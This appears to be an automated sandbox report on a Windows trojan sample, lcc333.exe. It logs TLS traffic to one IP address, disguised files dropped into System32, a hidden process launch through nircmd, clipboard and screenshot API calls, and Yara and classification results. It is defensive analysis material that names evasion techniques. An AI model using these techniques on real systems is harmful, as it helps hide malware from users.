                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49785 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49786 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49793 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49792 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49798 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49797 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49809 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49810 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49816 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49817 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49829 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49830 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49833 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49835 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49848 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49849 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49852 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49853 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49866 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49867 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49871 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49872 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49884 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49886 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49890 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49891 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49906 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49908 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49912 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49913 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49926 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49927 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49932 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49933 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49943 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49944 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49951 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49950 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49963 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49962 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49967 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49969 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49981 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49982 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49986 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49987 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:49998 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:50001 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:50005 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:50006 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.233.211.124:443 -> 192.168.2.5:50016 version: TLS 1.2
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_0000000140003460 OpenClipboard,GetClipboardData,GlobalLock,CreateFileA,SetFilePointer,GetFileSize,WriteFile,wcslen,WriteFile,WriteFile,CloseHandle,GlobalUnlock,CloseClipboard,15_2_0000000140003460
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_00000001400036C0 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_00000001400036C0
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_00000001400026E4 GetObjectA,GetDC,CreateDIBitmap,ReleaseDC,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,DeleteObject,15_2_00000001400026E4
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_0000000140001BBC memset,ReadFile,ReadFile,OpenClipboard,EmptyClipboard,RegisterClipboardFormatA,GlobalAlloc,GlobalLock,SetFilePointer,ReadFile,GlobalUnlock,SetClipboardData,CloseClipboard,CloseHandle,15_2_0000000140001BBC
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_0000000140003460 OpenClipboard,GetClipboardData,GlobalLock,CreateFileA,SetFilePointer,GetFileSize,WriteFile,wcslen,WriteFile,WriteFile,CloseHandle,GlobalUnlock,CloseClipboard,15_2_0000000140003460
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_000000014000C0FA CoUninitialize,CoInitialize,memset,memset,MultiByteToWideChar,MultiByteToWideChar,atof,CoInitialize,memset,MultiByteToWideChar,atoi,CoUninitialize,memset,sprintf,CloseHandle,memset,strcpy,strrchr,CoInitialize,CoCreateInstance,memset,MultiByteToWideChar,atoi,atoi,memset,MultiByteToWideChar,CoCreateInstance,CoTaskMemFree,memset,SHFileOperationA,GetDC,GetForegroundWindow,GetWindowRect,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,BitBlt,_stricmp,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SelectObject,DeleteDC,SelectObject,DeleteDC,DeleteObject,GetFileAttributesA,SetFileAttributesA,CreateFileA,GetFileSize,memset,SetFilePointer,WriteFile,CloseHandle,DeleteFileA,memset,strrchr,atoi,ExtractIconExA,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,KillTimer,DestroyIcon,memset,sprintf,strcpy,_strlwr,ShellExecuteA,GetDC,GetDeviceCaps,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,atoi,atoi,atoi,atoi,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,BitBlt,_stricmp,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SelectObject,DeleteDC,SelectObject,DeleteDC,DeleteObject,ReleaseDC,MessageBeep,memset,strcpy,SendMessageTimeoutA,SendMessageTimeoutA,RegOpenKeyExA,memset,memset,atoi,_itoa,SendMessageTimeoutA,SHChangeNotify,15_2_000000014000C0FA

                        System Summary

                        barindex
                        PE file contains section with special chars
                        Source: AutoDesk.exe.2.drStatic PE information: section name: .`[w
                        Source: AutoDesk.exe.2.drStatic PE information: section name: .[dL
                        Source: AutoDesk.exe.2.drStatic PE information: section name: .|q6
                        Uses the nircmd tool (NirSoft)
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Windows\System32\python.batJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Windows\System32\app_process.exeJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Windows\System32\AutoDesk.exeJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Windows\System32\play.batJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Windows\System32\nircmd.exeJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C810000_2_00007FF714C81000
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C889E00_2_00007FF714C889E0
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA69640_2_00007FF714CA6964
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA5C000_2_00007FF714CA5C00
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C935A00_2_00007FF714C935A0
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C9E5700_2_00007FF714C9E570
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C95D300_2_00007FF714C95D30
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C91D540_2_00007FF714C91D54
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C9DEF00_2_00007FF714C9DEF0
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C99EA00_2_00007FF714C99EA0
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA5E7C0_2_00007FF714CA5E7C
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C898000_2_00007FF714C89800
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C91F600_2_00007FF714C91F60
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C987940_2_00007FF714C98794
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA97280_2_00007FF714CA9728
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C917400_2_00007FF714C91740
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C980E40_2_00007FF714C980E4
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA40AC0_2_00007FF714CA40AC
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA08C80_2_00007FF714CA08C8
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA18740_2_00007FF714CA1874
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C939A40_2_00007FF714C939A4
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C921640_2_00007FF714C92164
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C919440_2_00007FF714C91944
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C8A2DB0_2_00007FF714C8A2DB
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C9DA5C0_2_00007FF714C9DA5C
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA3C100_2_00007FF714CA3C10
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C92C100_2_00007FF714C92C10
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C91B500_2_00007FF714C91B50
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C8ACAD0_2_00007FF714C8ACAD
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C8A47B0_2_00007FF714C8A47B
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA08C80_2_00007FF714CA08C8
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA64180_2_00007FF714CA6418
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_000000014000100015_2_0000000140001000
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_000000014000902C15_2_000000014000902C
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_0000000140014C8C15_2_0000000140014C8C
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_000000014000449015_2_0000000140004490
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_00000001400066A815_2_00000001400066A8
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_000000014000A4C415_2_000000014000A4C4
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_00000001400054D815_2_00000001400054D8
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_00000001400080E015_2_00000001400080E0
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_000000014000C0FA15_2_000000014000C0FA
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_00000001400057E015_2_00000001400057E0
                        Source: C:\Windows\System32\nircmd.exeCode function: String function: 0000000140015B94 appears 99 times
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: String function: 00007FF714C82710 appears 52 times
                        Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: AutoDesk.exe.2.drStatic PE information: Number of sections : 13 > 10
                        Source: lcc333.exe, 00000000.00000003.2106050470.000002172D7DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs lcc333.exe
                        Source: lcc333.exe, 00000000.00000003.2104927615.000002172D7DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs lcc333.exe
                        Source: lcc333.exe, 00000000.00000003.2105823533.000002172D7DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs lcc333.exe
                        Source: lcc333.exe, 00000000.00000003.2104758993.000002172D7DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs lcc333.exe
                        Source: lcc333.exe, 00000000.00000003.2105914516.000002172D7DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs lcc333.exe
                        Source: lcc333.exe, 00000000.00000003.2111135941.000002172D7E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs lcc333.exe
                        Source: lcc333.exe, 00000000.00000003.2105068052.000002172D7DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs lcc333.exe
                        Source: lcc333.exe, 00000000.00000003.2111291391.000002172D7E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs lcc333.exe
                        Source: lcc333.exe, 00000000.00000003.2105424268.000002172D7DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs lcc333.exe
                        Source: lcc333.exe, 00000000.00000003.2105250934.000002172D7DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs lcc333.exe
                        Source: lcc333.exe, 00000000.00000003.2108629944.000002172D7E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs lcc333.exe
                        Source: Yara matchFile source: 31.2.nircmd.exe.140000000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.nircmd.exe.140000000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.nircmd.exe.140000000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.nircmd.exe.140000000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.nircmd.exe.140000000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.0.nircmd.exe.140000000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.nircmd.exe.140000000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.nircmd.exe.140000000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000022.00000000.3344394477.0000000140017000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2528526092.0000000140017000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.2526970311.0000000140017000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000002.3347749954.0000000140017000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000000.2523657662.0000000140017000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000000.3340727157.0000000140017000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.3344008939.0000000140017000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: nircmd.exe PID: 3176, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: nircmd.exe PID: 4820, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: nircmd.exe PID: 3140, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: nircmd.exe PID: 1100, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Windows\System32\nircmd.exe, type: DROPPED
                        Source: classification engineClassification label: mal60.troj.evad.winEXE@59/30@1/3
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_0000000140012A40 free,CreateToolhelp32Snapshot,memset,Process32First,OpenProcess,memset,GetModuleHandleA,GetProcAddress,strcpy,CloseHandle,memcpy,Process32Next,CloseHandle,15_2_0000000140012A40
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_000000014000400C CoCreateInstance,MultiByteToWideChar,CoUninitialize,15_2_000000014000400C
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\Desktop\windows2.zipJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3812:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI6122Jump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c python.bat
                        Source: lcc333.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AutoDesk.exe")
                        Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "app_process.exe")
                        Source: C:\Users\user\Desktop\lcc333.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: lcc333.exe, 00000002.00000003.2491611998.000002B9372A3000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2492290000.000002B93730F000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2491866704.000002B936B7C000.00000004.00000020.00020000.00000000.sdmp, app_process.exe, 00000012.00000002.3348387189.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000012.00000000.2525092693.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000002.3347236766.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000000.2527968271.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000002.3357087112.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000000.3341938213.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000023.00000002.3357025814.00007FF791E50000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: lcc333.exe, 00000002.00000003.2491611998.000002B9372A3000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2492290000.000002B93730F000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2491866704.000002B936B7C000.00000004.00000020.00020000.00000000.sdmp, app_process.exe, 00000012.00000002.3348387189.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000012.00000000.2525092693.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000002.3347236766.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000000.2527968271.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000002.3357087112.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000000.3341938213.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000023.00000002.3357025814.00007FF791E50000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: lcc333.exe, 00000002.00000003.2491611998.000002B9372A3000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2492290000.000002B93730F000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2491866704.000002B936B7C000.00000004.00000020.00020000.00000000.sdmp, app_process.exe, 00000012.00000002.3348387189.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000012.00000000.2525092693.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000002.3347236766.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000000.2527968271.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000002.3357087112.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000000.3341938213.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000023.00000002.3357025814.00007FF791E50000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: lcc333.exe, 00000002.00000003.2491611998.000002B9372A3000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2492290000.000002B93730F000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2491866704.000002B936B7C000.00000004.00000020.00020000.00000000.sdmp, app_process.exe, 00000012.00000002.3348387189.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000012.00000000.2525092693.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000002.3347236766.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000000.2527968271.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000002.3357087112.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000000.3341938213.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000023.00000002.3357025814.00007FF791E50000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
